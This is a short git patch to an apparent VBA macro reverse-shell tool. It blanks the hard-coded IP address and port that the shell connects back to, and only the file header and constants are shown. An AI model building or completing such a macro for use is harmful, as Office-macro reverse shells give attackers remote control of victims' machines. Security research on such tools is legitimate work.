From c562d1e6517a30ee1bdc8708914a1a280ee8e01e Mon Sep 17 00:00:00 2001 From: kutubkhan786 <80762335+kutubkhan786@users.noreply.github.com> Date: Mon, 5 Jun 2023 12:04:20 +0530 Subject: [PATCH] Update VBA-Reverse-Shell.vba --- VBA-Reverse-Shell.vba | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/VBA-Reverse-Shell.vba b/VBA-Reverse-Shell.vba index 3536beb..579e878 100755 --- a/VBA-Reverse-Shell.vba +++ b/VBA-Reverse-Shell.vba @@ -3,8 +3,8 @@ 'Twitter: @JohnWoodman15 'Replace with your IP and Port -Const ip = "192.168.43.1" -Const port = "1337" +Const ip = "" +Const port = "" Const INVALID_SOCKET = -1 Const WSADESCRIPTION_LEN = 256